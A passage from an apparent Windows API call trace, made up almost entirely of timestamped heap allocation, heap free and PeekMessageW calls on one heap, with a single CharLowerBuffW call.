lpMsg=0x7df794) returned 0 [0119.664] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff050 [0119.664] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0119.664] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0119.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0119.664] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300ea8 [0119.664] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4d8 [0119.664] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd688 [0119.664] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0119.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd688 | out: hHeap=0x12c0000) returned 1 [0119.664] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0119.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0119.664] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e58 | out: hHeap=0x12c0000) returned 1 [0119.664] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.664] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.664] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0119.664] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ab8 [0119.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ab8 | out: hHeap=0x12c0000) returned 1 [0119.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0119.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.664] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a58 [0119.664] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a58 | out: hHeap=0x12c0000) returned 1 [0119.664] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0119.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0119.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0119.667] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0119.667] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0119.667] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0119.667] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e98 [0119.667] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.667] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e98 | out: hHeap=0x12c0000) returned 1 [0119.667] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.667] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff460 [0119.667] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0119.667] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0119.667] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0119.667] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0119.667] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.667] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0119.667] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.668] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0119.668] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0119.668] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0119.668] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0119.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd688 [0119.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff3c0 [0119.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0119.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0119.668] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd688 | out: hHeap=0x12c0000) returned 1 [0119.668] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0119.668] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff460 | out: hHeap=0x12c0000) returned 1 [0119.668] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3c0 | out: hHeap=0x12c0000) returned 1 [0119.668] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.668] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0119.668] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.668] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0119.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0119.668] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0119.668] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.668] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0119.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a18 [0119.668] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.669] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a18 | out: hHeap=0x12c0000) returned 1 [0119.669] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0119.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7c0 [0119.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919f8 [0119.669] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919f8 | out: hHeap=0x12c0000) returned 1 [0119.669] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7c0 | out: hHeap=0x12c0000) returned 1 [0119.669] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0119.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458918 [0119.669] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0119.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fefd8 [0119.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd628 [0119.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0119.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0119.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0119.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0119.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0119.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd580 [0119.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0119.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0119.669] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff3e8 [0119.670] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd580 | out: hHeap=0x12c0000) returned 1 [0119.670] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.670] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0119.670] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0119.670] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0119.670] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0119.670] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.670] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0119.670] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd598 [0119.670] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0119.670] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.670] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1491b98 [0119.670] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0119.670] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff348 [0119.670] CharLowerBuffW (in: lpsz="byte[115217]", cchLength=0xc | out: lpsz="byte[115217]") returned 0xc [0119.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x14be1f8 [0119.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0119.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0119.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0119.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0119.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0119.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0119.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd688 [0119.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef790 [0119.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd688 | out: hHeap=0x12c0000) returned 1 [0119.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef790 | out: hHeap=0x12c0000) returned 1 [0119.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0119.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0119.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0119.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff348 | out: hHeap=0x12c0000) returned 1 [0119.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0119.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3e8 | out: hHeap=0x12c0000) returned 1 [0119.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0119.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0119.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd628 | out: hHeap=0x12c0000) returned 1 [0119.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0119.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fefd8 | out: hHeap=0x12c0000) returned 1 [0119.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0119.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1491b78 [0119.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x14be048 [0119.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6b8 [0119.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0119.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0119.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0119.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14be1f8 | out: hHeap=0x12c0000) returned 1 [0119.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0119.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458918 | out: hHeap=0x12c0000) returned 1 [0119.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458818 | out: hHeap=0x12c0000) returned 1 [0119.673] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x14919b8 [0119.673] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x14be1f8 [0119.673] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0119.673] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef720 [0119.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0119.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0119.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14be048 | out: hHeap=0x12c0000) returned 1 [0119.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b78 | out: hHeap=0x12c0000) returned 1 [0119.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14a3268 | out: hHeap=0x12c0000) returned 1 [0119.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0119.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0119.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300ce8 | out: hHeap=0x12c0000) returned 1 [0119.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0119.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fece0 | out: hHeap=0x12c0000) returned 1 [0119.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0119.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd268 | out: hHeap=0x12c0000) returned 1 [0119.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fedf8 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300ea8 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff050 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd490 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd430 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300b98 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff398 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd448 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13011f0 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300d90 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff000 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300d20 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff370 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd418 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1301068 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0119.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff488 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd610 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fed30 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5f8 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4a8 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef740 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300bd0 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5b0 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef10 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1c0 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef550 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fed80 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0119.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5a0 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd220 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd280 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef560 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fedd0 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd508 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5c0 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd658 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff028 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0c8 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6b0 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef4e0 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12feb50 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd160 | out: hHeap=0x12c0000) returned 1 [0119.676] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, 